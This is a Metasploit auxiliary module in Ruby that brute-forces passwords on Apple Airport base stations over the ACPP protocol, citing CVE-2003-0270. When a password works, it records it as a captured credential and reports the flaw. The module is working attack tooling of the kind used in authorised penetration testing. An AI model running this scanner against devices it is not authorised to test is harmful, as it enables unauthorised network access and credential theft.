modules/auxiliary/scanner/acpp/login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/acpp'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
def initialize
super(
'Name' => 'Apple Airport ACPP Authentication Scanner',
'Description' => %q(
This module attempts to authenticate to an Apple Airport using its
proprietary and largely undocumented protocol known only as ACPP.
),
'Author' =>
[
'Jon Hart <jon_hart[at]rapid7.com>'
],
'References' =>
[
%w(CVE 2003-0270) # Fixed XOR key used to encrypt password
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(Rex::Proto::ACPP::DEFAULT_PORT)
])
deregister_options(
# there is no username, so remove all of these options
'DB_ALL_USERS',
'DB_ALL_CREDS',
'DB_SKIP_EXISTING',
'USERNAME',
'USERPASS_FILE',
'USER_FILE',
'USER_AS_PASS'
)
register_autofilter_ports([Rex::Proto::ACPP::DEFAULT_PORT])
end
def run_host(ip)
vprint_status("#{ip}:#{rport} - Starting ACPP login sweep")
cred_collection = Metasploit::Framework::PrivateCredentialCollection.new(
blank_passwords: datastore['BLANK_PASSWORDS'],
pass_file: datastore['PASS_FILE'],
password: datastore['PASSWORD']
)
cred_collection = prepend_db_passwords(cred_collection)
scanner = Metasploit::Framework::LoginScanner::ACPP.new(
configure_login_scanner(
host: ip,
port: rport,
proxies: datastore['PROXIES'],
cred_details: cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
connection_timeout: datastore['ConnectTimeout'],
max_send_size: datastore['TCP::max_send_size'],
send_delay: datastore['TCP::send_delay'],
framework: framework,
framework_module: self,
ssl: datastore['SSL'],
ssl_version: datastore['SSLVersion'],
ssl_verify_mode: datastore['SSLVerifyMode'],
ssl_cipher: datastore['SSLCipher'],
local_port: datastore['CPORT'],
local_host: datastore['CHOST']
)
)
scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(
module_fullname: fullname,
workspace_id: myworkspace_id
)
password = result.credential.private
if result.success?
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
create_credential_login(credential_data)
print_good("#{ip}:#{rport} - ACPP Login Successful: #{password}")
report_vuln(
host: ip,
port: rport,
proto: 'tcp',
name: 'Fixed XOR key used to encrypt passwords',
info: "Successful authentication with '#{password}'",
refs: references
)
else
invalidate_login(credential_data)
vprint_error("#{ip}:#{rport} - ACPP LOGIN FAILED: #{password} (#{result.status}: #{result.proof})")
end
end
end
end